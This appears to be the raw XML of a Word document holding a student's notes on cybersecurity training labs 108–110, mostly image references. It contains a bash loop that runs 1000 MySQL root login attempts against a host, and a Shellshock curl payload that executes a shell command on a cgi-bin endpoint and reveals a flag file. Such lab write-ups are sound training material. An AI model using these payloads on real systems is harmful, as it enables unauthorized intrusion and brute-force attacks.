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noSpellErr="1" wp14:textId="29D1F99C">
      <w:hyperlink r:id="R4abefce4cff446d3">
        <w:r w:rsidRPr="5F2548FC" w:rsidR="6EB8C186">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/108</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B991DAC" w:rsidP="5F2548FC" w:rsidRDefault="3B991DAC" w14:paraId="5C3ED244" w14:textId="314B6DBF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> in `seq 1 1000 </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>` ;do</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>uroot</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>pwrong</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h34.87.105.3 -P3306 --</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2548FC" w:rsidR="3B991DAC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>skip-ssl;done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F2548FC" w:rsidRDefault="5F2548FC" w14:paraId="6A2BC79A" w14:textId="313C03D0"/>
    <w:p w:rsidR="666F907F" w:rsidP="1C82D7E6" w:rsidRDefault="666F907F" w14:paraId="4EF60B4B" w14:textId="25432FA9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="27F54EC1">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="7526379E" wp14:anchorId="3A5C66E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47929" cy="2098439"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1788280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280734" name="Picture 1788280734"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId616122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7929" cy="2098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C82D7E6">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="7EFBBF37" wp14:anchorId="6E4CBFAE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-76200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4686300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3315928" cy="3240168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="993249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249282" name="Picture 993249282"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId868884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5928" cy="3240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C82D7E6">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="442501F7" wp14:editId="00757622">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2162175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2965185" cy="2391109"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="575085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399343" name="Picture 1054399343"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1762766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518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07D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="7C160757" w14:textId="14086CB6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="7A18BBF7" w14:textId="69035BC0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="3F19BAA7" w14:textId="22696D76">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="1780FB27" w14:textId="68574A3C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="606DCF7D" w14:textId="0C2A7357">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="4EDD0CE6" w14:textId="15200FA0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="0BCF0201" w14:textId="5CA662A8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="4DD89B12" w14:textId="030012E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="63A2C183" w14:textId="62D9DECA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="592730F0" w:rsidP="707D4F49" w:rsidRDefault="592730F0" w14:paraId="4B82FB5E" w14:textId="67C40984">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="R23cb70ae683f45dd">
        <w:r w:rsidRPr="1CB67953" w:rsidR="592730F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/109</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1CB67953" w:rsidP="1CB67953" w:rsidRDefault="1CB67953" w14:paraId="6012C10D" w14:textId="4270206C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="707D4F49" w:rsidP="707D4F49" w:rsidRDefault="707D4F49" w14:paraId="004AB971" w14:textId="216CFFEB" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="707D4F49">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="50AD53B8" wp14:anchorId="13E9920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519042" cy="3696215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="250837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837387" name="Picture 250837387"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1019788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9042" cy="369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7F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="07C93962" w14:textId="4488FCC7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="27F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="1CA85E49" w14:textId="1075C2BC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="27F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="34058E56" w14:textId="3ADBF133">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="27F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="076FD38E" w14:textId="2BE16E4F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="27F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="6E89EB6B" w14:textId="4533A984">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="27F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="42568142" w14:textId="00E90C48">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="27F54EC1" w:rsidP="27F54EC1" w:rsidRDefault="27F54EC1" w14:paraId="69A43A59" w14:textId="684C173B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A4D23EC">
        <w:drawing>
          <wp:inline wp14:editId="17354D3C" wp14:anchorId="5B920335">
            <wp:extent cx="2559847" cy="3327800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1042404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404294" name="Picture 1042404294"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId451492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9847" cy="33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D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="34215B75" w14:textId="6D982AA9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>┌──(ap㉿kali)-[~/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A4D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="6D2876D8" w14:textId="1676B146">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">└─$ curl -H "user-agent: () { :; }; echo; /bin/bash -c 'ls /var/www/html;'" </w:t>
      </w:r>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://34.87.105.3/cgi-bin/stats/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A4D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="0B5396D2" w14:textId="52169D7C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>cgi-bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A4D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="3024AF14" w14:textId="03DA34B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A4D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="28D8243F" w14:textId="5E7F6010">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>flag_NDViY.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A4D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="6AA9AF33" w14:textId="3F4B7315">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A4D23EC" w:rsidP="1CB67953" w:rsidRDefault="2A4D23EC" w14:paraId="33A5C307" w14:textId="4E83B703">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CB67953" w:rsidR="2A4D23EC">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CB67953" w:rsidP="1CB67953" w:rsidRDefault="1CB67953" w14:paraId="104A3708" w14:textId="4820BB8E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D0DB8B4" w:rsidRDefault="3D0DB8B4" w14:paraId="01A71408" w14:textId="3F81D4FE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D0DB8B4" w:rsidP="3D0DB8B4" w:rsidRDefault="3D0DB8B4" w14:paraId="43603F1D" w14:textId="0B86F69D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="Rc7d3cebe2b0743f9">
        <w:r w:rsidRPr="4D7DD9AA" w:rsidR="01CADE9F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="01CADE9F" w:rsidP="4D7DD9AA" w:rsidRDefault="01CADE9F" w14:paraId="56FCCE68" w14:textId="698D883E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="01CADE9F">
        <w:drawing>
          <wp:inline wp14:editId="11397994" wp14:anchorId="07A6C7F1">
            <wp:extent cx="3048000" cy="2684626"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1421110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110492" name="Picture 1421110492"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId307190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268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ADE9F" w:rsidP="4D7DD9AA" w:rsidRDefault="01CADE9F" w14:paraId="5C452093" w14:textId="1621368A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="01CADE9F">
        <w:drawing>
          <wp:inline wp14:editId="39FC985A" wp14:anchorId="01CF78BA">
            <wp:extent cx="3059273" cy="4044462"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="931357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357142" name="Picture 931357142"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1783590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9273" cy="404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4EBD9F">
        <w:drawing>
          <wp:inline wp14:editId="23EB4226" wp14:anchorId="1496DA2F">
            <wp:extent cx="3041009" cy="415471"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1025796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796890" name="Picture 1025796890"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId557915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1009" cy="41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DD9AA" w:rsidRDefault="4D7DD9AA" w14:paraId="5CA096F3" w14:textId="18CF8D69">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1DFE95B2" w:rsidP="4D7DD9AA" w:rsidRDefault="1DFE95B2" w14:paraId="2BA3B50F" w14:textId="46B706A5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1DFE95B2">
        <w:drawing>
          <wp:inline wp14:editId="1D5CD383" wp14:anchorId="7483EDEA">
            <wp:extent cx="4355654" cy="3819088"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="295997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997931" name="Picture 295997931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId947817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5654" cy="381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FE95B2">
        <w:drawing>
          <wp:inline wp14:editId="03AE9716" wp14:anchorId="6100E49A">
            <wp:extent cx="4372166" cy="3611114"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1518440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440671" name="Picture 1518440671"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1823488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166" cy="36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97C2BB"/>
    <w:rsid w:val="01CADE9F"/>
    <w:rsid w:val="0DD72819"/>
    <w:rsid w:val="1A2704E1"/>
    <w:rsid w:val="1C2783DB"/>
    <w:rsid w:val="1C82D7E6"/>
    <w:rsid w:val="1CB67953"/>
    <w:rsid w:val="1DFE95B2"/>
    <w:rsid w:val="1FC04F35"/>
    <w:rsid w:val="26123C0F"/>
    <w:rsid w:val="272E6CDF"/>
    <w:rsid w:val="27F54EC1"/>
    <w:rsid w:val="2997C2BB"/>
    <w:rsid w:val="2A4D23EC"/>
    <w:rsid w:val="2BB6C387"/>
    <w:rsid w:val="2F4EBD9F"/>
    <w:rsid w:val="3B991DAC"/>
    <w:rsid w:val="3CA9FC6F"/>
    <w:rsid w:val="3D0DB8B4"/>
    <w:rsid w:val="3FA676B2"/>
    <w:rsid w:val="4D7DD9AA"/>
    <w:rsid w:val="592730F0"/>
    <w:rsid w:val="5F2548FC"/>
    <w:rsid w:val="666F907F"/>
    <w:rsid w:val="671AAA74"/>
    <w:rsid w:val="6AF18FE6"/>
    <w:rsid w:val="6EB8C186"/>
    <w:rsid w:val="707D4F49"/>
    <w:rsid w:val="70EE8CAA"/>
    <w:rsid w:val="721A61AD"/>
    <w:rsid w:val="757E9A22"/>
    <w:rsid w:val="7756D765"/>
    <w:rsid w:val="785E19AB"/>
    <w:rsid w:val="7AD79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C2BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AB69A2AC-A7A1-483A-8CA2-D2D80595DE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66F907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6122244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId868884353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId1762766475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId1019788922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId451492465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/110" TargetMode="External" Id="Rc7d3cebe2b0743f9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId307190517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId1783590450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId557915729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="rId947817312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId1823488156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/108" TargetMode="External" Id="R4abefce4cff446d3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/109" TargetMode="External" Id="R23cb70ae683f45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ae77042f5a1f4aca2c1849db70f2ff6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0b7c111eef281580fe8d60d0869af1d0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9F4B96D9-6570-4C8D-AAC6-57FEC63D73C4}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A2B6D2BB-FB52-4BF9-8EA5-974364E140F1}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0301B0C6-3871-4E5F-A498-1266443832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Pattrira THANONGSAKSRIKUN</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>aphiwit bunlom</lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-16T08:25:58.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-22T13:40:29.7012767Z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